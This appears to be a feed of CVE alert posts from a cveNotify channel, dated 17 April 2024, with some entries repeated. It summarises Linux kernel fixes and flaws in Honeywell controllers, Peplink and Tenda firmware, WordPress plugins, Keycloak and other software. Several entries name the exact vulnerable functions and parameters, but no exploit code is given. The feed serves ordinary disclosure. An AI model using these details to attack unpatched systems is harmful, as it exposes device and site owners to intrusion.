🚨 CVE-2024-26606In the Linux kernel, the following vulnerability has been resolved:binder: signal epoll threads of self-workIn (e)poll mode, threads often depend on I/O events to determine whendata is ready for consumption. Within binder, a thread may initiate acommand via BINDER_WRITE_READ without a read buffer and then make useof epoll_wait() or similar to consume any responses afterwards.It is then crucial that epoll threads are signaled via wakeup when theyqueue their own work. Otherwise, they risk waiting indefinitely for anevent leaving their work unhandled. What is worse, subsequent commandswon't trigger a wakeup either as the thread has pending work.🎖@cveNotify |
|
| 2024-04-17 18:07:26 |
🚨 CVE-2024-26605In the Linux kernel, the following vulnerability has been resolved:PCI/ASPM: Fix deadlock when enabling ASPMA last minute revert in 6.7-final introduced a potential deadlock whenenabling ASPM during probe of Qualcomm PCIe controllers as reported bylockdep: ============================================ WARNING: possible recursive locking detected 6.7.0 #40 Not tainted -------------------------------------------- kworker/u16:5/90 is trying to acquire lock: ffffacfa78ced000 (pci_bus_sem){++++}-{3:3}, at: pcie_aspm_pm_state_change+0x58/0xdc but task is already holding lock: ffffacfa78ced000 (pci_bus_sem){++++}-{3:3}, at: pci_walk_bus+0x34/0xbc other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(pci_bus_sem); lock(pci_bus_sem); *** DEADLOCK *** Call trace: print_deadlock_bug+0x25c/0x348 __lock_acquire+0x10a4/0x2064 lock_acquire+0x1e8/0x318 down_read+0x60/0x184 pcie_aspm_pm_state_change+0x58/0xdc pci_set_full_power_state+0xa8/0x114 pci_set_power_state+0xc4/0x120 qcom_pcie_enable_aspm+0x1c/0x3c [pcie_qcom] pci_walk_bus+0x64/0xbc qcom_pcie_host_post_init_2_7_0+0x28/0x34 [pcie_qcom]The deadlock can easily be reproduced on machines like the Lenovo ThinkPadX13s by adding a delay to increase the race window during asynchronousprobe where another thread can take a write lock.Add a new pci_set_power_state_locked() and associated helper functions thatcan be called with the PCI bus semaphore held to avoid taking the read locktwice.🎖@cveNotify |
|
| 2024-04-17 18:07:25 |
🚨 CVE-2024-26602In the Linux kernel, the following vulnerability has been resolved:sched/membarrier: reduce the ability to hammer on sys_membarrierOn some systems, sys_membarrier can be very expensive, causing overallslowdowns for everything. So put a lock on the path in order toserialize the accesses to prevent the ability for this to be called attoo high of a frequency and saturate the machine.🎖@cveNotify |
|
| 2024-04-17 18:07:24 |
🚨 CVE-2024-26601In the Linux kernel, the following vulnerability has been resolved:ext4: regenerate buddy after block freeing failed if under fc replayThis mostly reverts commit 6bd97bf273bd ("ext4: remove redundantmb_regenerate_buddy()") and reintroduces mb_regenerate_buddy(). Based oncode in mb_free_blocks(), fast commit replay can end up marking as freeblocks that are already marked as such. This causes corruption of thebuddy bitmap so we need to regenerate it in that case.🎖@cveNotify |
|
| 2024-04-17 17:37:43 |
🚨 CVE-2023-5407Controller denial of service due to improper handling of a specially crafted message received by the controller.See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 17:37:42 |
🚨 CVE-2023-5405Server information leak for the CDA Server process memory can occur when an error is generated in response to a specially crafted message. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 17:37:41 |
🚨 CVE-2023-5403Server hostname translation to IP address manipulation which could lead to an attacker performing remote code execution or causing a failure.See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 17:37:38 |
🚨 CVE-2023-5401Server receiving a malformed message based on a using the specified key values can cause a stack overflow vulnerability which could lead to an attacker performing remote code execution or causing a failure. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 17:37:37 |
🚨 CVE-2023-5398Server receiving a malformed message based on a list of IPs resulting in heap corruption causing a denial of service. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 17:37:36 |
🚨 CVE-2023-5396Server receiving a malformed message creates connection for a hostname that may cause a stack overflow resulting in possible remote code execution. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 17:37:32 |
🚨 CVE-2023-45744A data integrity vulnerability exists in the web interface /cgi-bin/upload_config.cgi functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to configuration modification. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 17:07:24 |
🚨 CVE-2021-46909In the Linux kernel, the following vulnerability has been resolved:ARM: footbridge: fix PCI interrupt mappingSince commit 30fdfb929e82 ("PCI: Add a call to pci_assign_irq() inpci_device_probe()"), the PCI code will call the IRQ mapping functionwhenever a PCI driver is probed. If these are marked as __init, thiscauses an oops if a PCI driver is loaded or bound after the kernel hasinitialised.🎖@cveNotify |
|
| 2024-04-17 16:37:42 |
🚨 CVE-2024-26919In the Linux kernel, the following vulnerability has been resolved:usb: ulpi: Fix debugfs directory leakThe ULPI per-device debugfs root is named after the ulpi device'sparent, but ulpi_unregister_interface tries to remove a debugfsdirectory named after the ulpi device itself. This results in thedirectory sticking around and preventing subsequent (deferred) probesfrom succeeding. Change the directory name to match the ulpi device.🎖@cveNotify |
|
| 2024-04-17 16:37:41 |
🚨 CVE-2024-26916In the Linux kernel, the following vulnerability has been resolved:Revert "drm/amd: flush any delayed gfxoff on suspend entry"commit ab4750332dbe ("drm/amdgpu/sdma5.2: add begin/end_use ringcallbacks") caused GFXOFF control to be used more heavily and thecodepath that was removed from commit 0dee72639533 ("drm/amd: flush anydelayed gfxoff on suspend entry") now can be exercised at suspend again.Users report that by using GNOME to suspend the lockscreen trigger willcause SDMA traffic and the system can deadlock.This reverts commit 0dee726395333fea833eaaf838bc80962df886c8.🎖@cveNotify |
|
| 2024-04-17 16:37:36 |
🚨 CVE-2024-26913In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Fix dcn35 8k30 Underflow/Corruption Issue[why]odm calculation is missing for pipe split policy determinationand cause Underflow/Corruption issue.[how]Add the odm calculation.🎖@cveNotify |
|
| 2024-04-17 16:37:35 |
🚨 CVE-2024-26911In the Linux kernel, the following vulnerability has been resolved:drm/buddy: Fix alloc_range() error handling codeFew users have observed display corruption when they bootthe machine to KDE Plasma or playing games. We have rootcaused the problem that whenever alloc_range() couldn'tfind the required memory blocks the function was returningSUCCESS in some of the corner cases.The right approach would be if the total allocated sizeis less than the required size, the function shouldreturn -ENOSPC.🎖@cveNotify |
|
| 2024-04-17 16:37:31 |
🚨 CVE-2023-52645In the Linux kernel, the following vulnerability has been resolved:pmdomain: mediatek: fix race conditions with genpdIf the power domains are registered first with genpd and *after that*the driver attempts to power them on in the probe sequence, then it ispossible that a race condition occurs if genpd tries to power them onin the same time.The same is valid for powering them off before unregistering themfrom genpd.Attempt to fix race conditions by first removing the domains from genpdand *after that* powering down domains.Also first power up the domains and *after that* register themto genpd.🎖@cveNotify |
|
| 2024-04-17 16:37:30 |
🚨 CVE-2024-2419A flaw was found in Keycloak's redirect_uri validation logic. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to the theft of an access token, making it possible for the attacker to impersonate other users. It is very similar to CVE-2023-6291.🎖@cveNotify |
|
| 2024-04-17 16:37:29 |
🚨 CVE-2024-1249A flaw was found in Keycloak's OIDC component in the "checkLoginIframe," which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.🎖@cveNotify |
|
| 2024-04-17 16:37:26 |
🚨 CVE-2024-1635A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. At HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.🎖@cveNotify |
|
| 2024-04-17 16:37:25 |
🚨 CVE-2021-41434A stored Cross-Site Scripting (XSS) vulnerability exists in version 1.0 of the Expense Management System application that allows for arbitrary execution of JavaScript commands through index.php.🎖@cveNotify |
|
| 2024-04-17 15:37:33 |
🚨 CVE-2023-6805The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 4.4.7 via the fetch_feed functionality. This makes it possible for authenticated attackers, with contributor access and above, to make web requests to arbitrary locations originating from the web application and can be used to modify information from internal services. NOTE: This vulnerability, exploitable by contributor-level users, was was fixed in version 4.4.7. The same vulnerability was fixed for author-level users in version 4.4.8.🎖@cveNotify |
|
| 2024-04-17 15:37:26 |
🚨 CVE-2023-45744A data integrity vulnerability exists in the web interface /cgi-bin/upload_config.cgi functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to configuration modification. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 15:37:25 |
🚨 CVE-2023-40146A privilege escalation vulnerability exists in the /bin/login functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted command line argument can lead to a limited-shell escape and elevated capabilities. An attacker can authenticate with hard-coded credentials and execute unblocked default busybox functionality to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 15:37:24 |
🚨 CVE-2023-39367An OS command injection vulnerability exists in the web interface mac2name functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 14:37:41 |
🚨 CVE-2024-32293Tenda W30E v1.0 V1.0.1.25(633) firmware has a stack overflow vulnerability via the page parameter in the fromDhcpListClient function.🎖@cveNotify |
|
| 2024-04-17 14:37:40 |
🚨 CVE-2024-32290Tenda W30E v1.0 v1.0.1.25(633) firmware has a stack overflow vulnerability via the page parameter in the fromAddressNat function.🎖@cveNotify |
|
| 2024-04-17 14:37:36 |
🚨 CVE-2024-32287Tenda W30E v1.0 V1.0.1.25(633) firmware has a stack overflow vulnerability via the qos parameter in the fromqossetting function.🎖@cveNotify |
|
| 2024-04-17 14:37:35 |
🚨 CVE-2024-32285Tenda W30E v1.0 V1.0.1.25(633) firmware has a stack overflow vulnerability via the password parameter in the formaddUserName function.🎖@cveNotify |
|
| 2024-04-17 14:37:34 |
🚨 CVE-2024-32283Tenda FH1203 V2.0.1.6 firmware has a command injection vulnerablility in formexeCommand function via the cmdinput parameter.🎖@cveNotify |
|
| 2024-04-17 14:37:31 |
🚨 CVE-2024-31578FFmpeg version n6.1.1 was discovered to contain a heap use-after-free via the av_hwframe_ctx_init function.🎖@cveNotify |
|
| 2024-04-17 14:37:30 |
🚨 CVE-2024-1249A flaw was found in Keycloak's OIDC component in the "checkLoginIframe," which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.🎖@cveNotify |
|
| 2024-04-17 14:37:29 |
🚨 CVE-2024-1132A flaw was found in Keycloak, where it does not properly validate URLs included in a redirect. This issue could allow an attacker to construct a malicious request to bypass validation and access other URLs and sensitive information within the domain or conduct further attacks. This flaw affects any client that utilizes a wildcard in the Valid Redirect URIs field, and requires user interaction within the malicious URL.🎖@cveNotify |
|
| 2024-04-17 14:37:26 |
🚨 CVE-2023-45744A data integrity vulnerability exists in the web interface /cgi-bin/upload_config.cgi functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to configuration modification. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 14:37:25 |
🚨 CVE-2023-40146A privilege escalation vulnerability exists in the /bin/login functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted command line argument can lead to a limited-shell escape and elevated capabilities. An attacker can authenticate with hard-coded credentials and execute unblocked default busybox functionality to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 14:37:24 |
🚨 CVE-2023-39367An OS command injection vulnerability exists in the web interface mac2name functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 13:37:36 |
🚨 CVE-2024-32313Tenda FH1205 V2.0.0.7(775) firmware has a stack overflow vulnerability located via the adslPwd parameter of the formWanParameterSetting function.🎖@cveNotify |
|
| 2024-04-17 13:37:35 |
🚨 CVE-2024-32310Tenda F1203 V2.0.1.6 firmware has a stack overflow vulnerability located in the PPW parameter of the fromWizardHandle function.🎖@cveNotify |
|
| 2024-04-17 13:37:31 |
🚨 CVE-2024-32301Tenda AC7V1.0 v15.03.06.44 firmware has a stack overflow vulnerability via the PPW parameter in the fromWizardHandle function.🎖@cveNotify |
|
| 2024-04-17 13:37:30 |
🚨 CVE-2023-6805The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 4.4.7 via the fetch_feed functionality. This makes it possible for authenticated attackers, with contributor access and above, to make web requests to arbitrary locations originating from the web application and can be used to modify information from internal services. NOTE: This vulnerability, exploitable by contributor-level users, was was fixed in version 4.4.7. The same vulnerability was fixed for author-level users in version 4.4.8.🎖@cveNotify |
|
| 2024-04-17 13:37:26 |
🚨 CVE-2023-45744A data integrity vulnerability exists in the web interface /cgi-bin/upload_config.cgi functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to configuration modification. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 13:37:25 |
🚨 CVE-2023-40146A privilege escalation vulnerability exists in the /bin/login functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted command line argument can lead to a limited-shell escape and elevated capabilities. An attacker can authenticate with hard-coded credentials and execute unblocked default busybox functionality to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 13:37:24 |
🚨 CVE-2023-39367An OS command injection vulnerability exists in the web interface mac2name functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-17 13:07:32 |
🚨 CVE-2023-50872The API in Accredible Credential.net December 6th, 2023 allows an Insecure Direct Object Reference attack that discloses partial information about certificates and their respective holder. NOTE: the excellium-services.com web page about this issue mentions "Vendor says that it's not a security issue."🎖@cveNotify |
|
| 2024-04-17 13:07:31 |
🚨 CVE-2024-32026Kohya_ss is a GUI for Kohya's Stable Diffusion trainers. Kohya_ss is vulnerable to a command injection in `git_caption_gui.py`. This vulnerability is fixed in 23.1.5.🎖@cveNotify |
|
| 2024-04-17 13:07:30 |
🚨 CVE-2024-32025Kohya_ss is a GUI for Kohya's Stable Diffusion trainers. Kohya_ss is vulnerable to a command injection in `group_images_gui.py`. This vulnerability is fixed in 23.1.5.🎖@cveNotify |
|
| 2024-04-17 13:07:27 |
🚨 CVE-2024-32024Kohya_ss is a GUI for Kohya's Stable Diffusion trainers. Kohya_ss is vulnerable to a path injection in the `common_gui.py` `add_pre_postfix` function. This vulnerability is fixed in 23.1.5.🎖@cveNotify |
|
| 2024-04-17 13:07:26 |
🚨 CVE-2024-31451DocsGPT is a GPT-powered chat for documentation. DocsGPT is vulnerable to unauthenticated limited file write in routes.py. This vulnerability is fixed in 0.8.1.🎖@cveNotify |
|
| 2024-04-17 13:07:25 |
🚨 CVE-2024-30256Open WebUI is a user-friendly WebUI for LLMs. Open-webui is vulnerable to authenticated blind server-side request forgery. This vulnerability is fixed in 0.1.117.🎖@cveNotify |
|
| 2024-04-17 12:37:26 |
🚨 CVE-2024-3910A vulnerability, which was classified as critical, has been found in Tenda AC500 2.0.1.9(1307). Affected by this issue is the function fromDhcpListClient of the file /goform/DhcpListClient. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-261146 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-17 12:37:25 |
🚨 CVE-2024-3333The Essential Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attributes of widgets in all versions up to, and including, 5.9.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-17 12:37:24 |
🚨 CVE-2023-48784A use of externally-controlled format string vulnerability [CWE-134] in FortiOS version 7.4.1 and below, version 7.2.7 and below, 7.0 all versions, 6.4 all versions command line interface may allow a local privileged attacker with super-admin profile and CLI access to execute arbitrary code or commands via specially crafted requests.🎖@cveNotify |
|
| 2024-04-17 11:37:26 |
🚨 CVE-2023-51418Missing Authorization vulnerability in Joris van Montfort JVM rich text icons.This issue affects JVM rich text icons: from n/a through 1.2.6.🎖@cveNotify |
|
| 2024-04-17 11:37:25 |
🚨 CVE-2022-41698Missing Authorization vulnerability in Layered If Menu.This issue affects If Menu: from n/a through 0.16.3.🎖@cveNotify |
|
| 2024-04-17 11:37:24 |
🚨 CVE-2024-3871The Delta Electronics DVW-W02W2-E2 devices expose a web administration interface to users. This interface implements multiple features that are affected by command injections and stack overflows vulnerabilities.Successful exploitation of these flaws would allow remote unauthenticated attackers to gain remote code execution with elevated privileges on the affected devices.This issue affects DVW-W02W2-E2 through version 2.5.2.🎖@cveNotify |
|
| 2024-04-17 10:37:40 |
🚨 CVE-2024-26828In the Linux kernel, the following vulnerability has been resolved:cifs: fix underflow in parse_server_interfaces()In this loop, we step through the buffer and after each item we checkif the size_left is greater than the minimum size we need. However,the problem is that "bytes_left" is type ssize_t while sizeof() is typesize_t. That means that because of type promotion, the comparison isdone as an unsigned and if we have negative bytes left the loopcontinues instead of ending.🎖@cveNotify |
|
| 2024-04-17 10:37:36 |
🚨 CVE-2024-26825In the Linux kernel, the following vulnerability has been resolved:nfc: nci: free rx_data_reassembly skb on NCI device cleanuprx_data_reassembly skb is stored during NCI data exchange for processingfragmented packets. It is dropped only when the last fragment is processedor when an NTF packet with NCI_OP_RF_DEACTIVATE_NTF opcode is received.However, the NCI device may be deallocated before that which leads to skbleak.As by design the rx_data_reassembly skb is bound to the NCI device andnothing prevents the device to be freed before the skb is processed insome way and cleaned, free it on the NCI device cleanup.Found by Linux Verification Center (linuxtesting.org) with Syzkaller.🎖@cveNotify |
|
| 2024-04-17 10:37:35 |
🚨 CVE-2024-26823In the Linux kernel, the following vulnerability has been resolved:irqchip/gic-v3-its: Restore quirk probing for ACPI-based systemsWhile refactoring the way the ITSs are probed, the handling of quirksapplicable to ACPI-based platforms was lost. As a result, systems such asHIP07 lose their GICv4 functionnality, and some other may even fail toboot, unless they are configured to boot with DT.Move the enabling of quirks into its_probe_one(), making it common to allfirmware implementations.🎖@cveNotify |
|
| 2024-04-17 10:37:31 |
🚨 CVE-2024-26821In the Linux kernel, the following vulnerability has been resolved:fs: relax mount_setattr() permission checksWhen we added mount_setattr() I added additional checks compared to thelegacy do_reconfigure_mnt() and do_change_type() helpers used by regularmount(2). If that mount had a parent then verify that the caller and themount namespace the mount is attached to match and if not make sure thatit's an anonymous mount.The real rootfs falls into neither category. It is neither an anoymousmount because it is obviously attached to the initial mount namespacebut it also obviously doesn't have a parent mount. So that means legacymount(2) allows changing mount properties on the real rootfs butmount_setattr(2) blocks this. I never thought much about this but ofcourse someone on this planet of earth changes properties on the realrootfs as can be seen in [1].Since util-linux finally switched to the new mount api in 2.39 not solong ago it also relies on mount_setattr() and that surfaced this issuewhen Fedora 39 finally switched to it. Fix this.🎖@cveNotify |
|
| 2024-04-17 10:37:30 |
🚨 CVE-2024-26818In the Linux kernel, the following vulnerability has been resolved:tools/rtla: Fix clang warning about mount_point var sizeclang is reporting this warning:$ make HOSTCC=clang CC=clang LLVM_IAS=1[...]clang -O -g -DVERSION=\"6.8.0-rc3\" -flto=auto -fexceptions -fstack-protector-strong -fasynchronous-unwind-tables -fstack-clash-protection -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS $(pkg-config --cflags libtracefs) -c -o src/utils.o src/utils.csrc/utils.c:548:66: warning: 'fscanf' may overflow; destination buffer in argument 3 has size 1024, but the corresponding specifier may require size 1025 [-Wfortify-source] 548 | while (fscanf(fp, "%*s %" STR(MAX_PATH) "s %99s %*s %*d %*d\n", mount_point, type) == 2) { | ^Increase mount_point variable size to MAX_PATH+1 to avoid the overflow.🎖@cveNotify |
|
| 2024-04-17 10:37:26 |
🚨 CVE-2023-52643In the Linux kernel, the following vulnerability has been resolved:iio: core: fix memleak in iio_device_register_sysfsWhen iio_device_register_sysfs_group() fails, we shouldfree iio_dev_opaque->chan_attr_group.attrs to preventpotential memleak.🎖@cveNotify |
|
| 2024-04-17 10:37:25 |
🚨 CVE-2023-44227Missing Authorization vulnerability in Mitchell Bennis Simple File List.This issue affects Simple File List: from n/a through 6.1.9.🎖@cveNotify |
|
| 2024-04-17 10:37:24 |
🚨 CVE-2022-34769Michlol - rashim web interface Insecure direct object references (IDOR).First of all, the attacker needs to login.After he performs log into the system there are some functionalities that the specific user is not allowed to perform.However all the attacker needs to do in order to achieve his goals is to change the value of the ptMsl parameter and thenthe attacker can access sensitive data that he not supposed to access because its belong to another user.🎖@cveNotify |
|
| 2024-04-17 09:37:41 |
🚨 CVE-2024-32546Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Adam Bowen Tax Rate Upload allows Reflected XSS.This issue affects Tax Rate Upload: from n/a through 2.4.5.🎖@cveNotify |
|
| 2024-04-17 09:37:37 |
🚨 CVE-2024-32543Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Minoji MJ Update History allows Reflected XSS.This issue affects MJ Update History: from n/a through 1.0.4.🎖@cveNotify |
|
| 2024-04-17 09:37:36 |
🚨 CVE-2024-32541Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tobias Battenberg WP-Cufon allows Stored XSS.This issue affects WP-Cufon: from n/a through 1.6.10.🎖@cveNotify |
|
| 2024-04-17 09:37:32 |
🚨 CVE-2024-32538Cross-Site Request Forgery (CSRF) vulnerability in Joshua Eldridge Easy CountDowner allows Stored XSS.This issue affects Easy CountDowner: from n/a through 1.0.8.🎖@cveNotify |
|
| 2024-04-17 09:37:31 |
🚨 CVE-2024-32535Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jojaba Access Category Password allows Reflected XSS.This issue affects Access Category Password: from n/a through 1.5.1.🎖@cveNotify |
|
| 2024-04-17 09:37:26 |
🚨 CVE-2024-32533Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Peter Shaw LH Add Media From Url allows Reflected XSS.This issue affects LH Add Media From Url: from n/a through 1.22.🎖@cveNotify |
|
| 2024-04-17 09:37:25 |
🚨 CVE-2023-25043Incorrect Authorization vulnerability in Supsystic Data Tables Generator.This issue affects Data Tables Generator: from n/a through 1.10.25.🎖@cveNotify |
|
| 2024-04-17 08:37:44 |
🚨 CVE-2024-3833Object corruption in WebAssembly in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-17 08:37:43 |
🚨 CVE-2024-32550Cross-Site Request Forgery (CSRF) vulnerability in BMI Adult & Kid Calculator allows Stored XSS.This issue affects BMI Adult & Kid Calculator: from n/a through 1.2.1.🎖@cveNotify |
|
| 2024-04-17 08:37:42 |
🚨 CVE-2024-32548Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hideki Tanaka What's New Generator allows Stored XSS.This issue affects What's New Generator: from n/a through 2.0.2.🎖@cveNotify |
|
| 2024-04-17 08:37:38 |
🚨 CVE-2024-32547Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Max Bond Code Insert Manager (Q2W3 Inc Manager) allows Reflected XSS.This issue affects Code Insert Manager (Q2W3 Inc Manager): from n/a through 2.5.3.🎖@cveNotify |
|
| 2024-04-17 08:37:37 |
🚨 CVE-2024-32525Missing Authorization vulnerability in Theme My Login.This issue affects Theme My Login: from n/a through 7.1.6.🎖@cveNotify |
|
| 2024-04-17 08:37:36 |
🚨 CVE-2024-32522Missing Authorization vulnerability in Jaed Mosharraf & Pluginbazar Team Open Close WooCommerce Store.This issue affects Open Close WooCommerce Store: from n/a through 4.9.1.🎖@cveNotify |
|
| 2024-04-17 08:37:32 |
🚨 CVE-2024-32520Missing Authorization vulnerability in WPClever WPC Grouped Product for WooCommerce.This issue affects WPC Grouped Product for WooCommerce: from n/a through 4.4.2.🎖@cveNotify |
|
| 2024-04-17 08:37:31 |
🚨 CVE-2024-32518Missing Authorization vulnerability in Pepro Dev. Group PeproDev Ultimate Invoice.This issue affects PeproDev Ultimate Invoice: from n/a through 2.0.0.🎖@cveNotify |
|
| 2024-04-17 08:37:30 |
🚨 CVE-2024-32516Missing Authorization vulnerability in Palscode Multi Currency For WooCommerce.This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5.🎖@cveNotify |
|
| 2024-04-17 08:37:26 |
🚨 CVE-2024-32515Missing Authorization vulnerability in Qamar Sheeraz, Nasir Ahmad Mega Addons For Elementor.This issue affects Mega Addons For Elementor: from n/a through 1.8.🎖@cveNotify |
|
| 2024-04-17 08:37:25 |
🚨 CVE-2024-32509Missing Authorization vulnerability in Loopus WP Cost Estimation & Payment Forms Builder.This issue affects WP Cost Estimation & Payment Forms Builder: from n/a through 10.1.76.🎖@cveNotify |
|
| 2024-04-17 08:37:24 |
🚨 CVE-2024-32506Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SoftLab Radio Player.This issue affects Radio Player: from n/a through 2.0.73.🎖@cveNotify |
|
| 2024-04-17 05:37:29 |
🚨 CVE-2024-2309The WP STAGING WordPress Backup Plugin WordPress plugin before 3.4.0, wp-staging-pro WordPress plugin before 5.4.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-04-17 05:37:26 |
🚨 CVE-2024-2118The Social Media Share Buttons & Social Sharing Icons WordPress plugin before 2.8.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-04-17 05:37:25 |
🚨 CVE-2024-1219The Easy Social Feed WordPress plugin before 6.5.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-04-17 05:37:24 |
🚨 CVE-2024-0868The coreActivity: Activity Logging plugin for WordPress plugin before 2.1 retrieved IP addresses of requests via headers such X-FORWARDED to log them, allowing users to spoof them by providing an arbitrary value🎖@cveNotify |
|
| 2024-04-17 03:37:26 |
🚨 CVE-2024-26817In the Linux kernel, the following vulnerability has been resolved:amdkfd: use calloc instead of kzalloc to avoid integer overflowThis uses calloc instead of doing the multiplication which mightoverflow.🎖@cveNotify |
|
| 2024-04-17 03:37:25 |
🚨 CVE-2024-25713yyjson through 0.8.0 has a double free, leading to remote code execution in some cases, because the pool_free function lacks loop checks. (pool_free is part of the pool series allocator, along with pool_malloc and pool_realloc.)🎖@cveNotify |
|
| 2024-04-17 03:37:24 |
🚨 CVE-2024-26134cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.🎖@cveNotify |
|
| 2024-04-17 02:37:32 |
🚨 CVE-2023-51201Cleartext Transmission issue in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to access sensitive information via a man-in-the-middle attack. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-04-17 02:37:26 |
🚨 CVE-2023-51199Buffer Overflow vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code or cause a denial of service via improper handling of arrays or strings. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-04-17 02:37:25 |
🚨 CVE-2023-33566An unauthorized node injection vulnerability has been identified in ROS2 Foxy Fitzroy versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could allow a malicious user to inject malicious ROS2 nodes into the system remotely. Once injected, these nodes could disrupt the normal operations of the system or cause other potentially harmful behavior. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-04-17 02:37:24 |
